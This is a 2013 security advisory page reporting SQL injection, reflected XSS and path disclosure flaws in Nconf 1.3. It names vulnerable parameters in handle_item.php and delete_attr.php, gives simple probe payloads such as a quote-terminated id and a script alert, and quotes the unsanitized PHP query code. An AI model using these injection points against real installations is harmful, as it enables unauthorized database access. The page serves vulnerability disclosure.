Nconf 1.3 SQL Injection / Cross Site Scripting

2013.03.05
Credit: Saadat Ullah
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79

# Exploit Title: nconf handle_item.php?Modify_attr.php etc Multiple Sql injection # Date: 2013/3/4 # Exploit Author: Saadat Ullah?saadi_linux@rocketmail.com # Software Link: http://sourceforge.net/projects/nconf/files/nconf/ # Vendors: http://www.nconf.org/ # Author HomePage: http://security-geeks.blogspot.com/ # Version: nconf 1.3 # Tested on: Server: Apache/2.2.15 (Centos) PHP/5.3.3 Nconf Is vulnerable to Sql injection in most of the files , they did'nt sanitize any GET POST FILEDs. Some OF them Are Blind Sqli In handle_item.php on Id parameter handle_item.php?id=1' P0c $query2 .= ' AND id_item <> '.$_GET["id"]; delete_attr.php POST DATA : id=15'&name=&delete=yes&submit=Delete Poc Id Via GEt FIELD $query = 'SELECT attr_name, config_class FROM ConfigAttrs, ConfigClasses WHERE id_attr='.$_GET["id"].' AND fk_id_class=ConfigClasses.id_class'; And id via Post Field $query = 'DELETE FROM ConfigAttrs WHERE id_attr='.$_POST["id"]; clone_host_write2db.php Again On id paramerter. Their are Many more... A Simple Reflected XSS http://localhost/nconf/handle_item.php?item=<script>alert('Hi');</script> Poc $item_class = $_GET["item"]; . . echo without Sanitization echo '<h2>'.ucfirst($handle_action).' '.$item_class.'</h2>'; A LocalPath Disclose http://localhost/nconf/call_file.php?ajax_file=service_list.php&debug=yes Post Data: host_id=5372&highlight_service=5373&class=a #Independent Pakistani Security Researcher


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top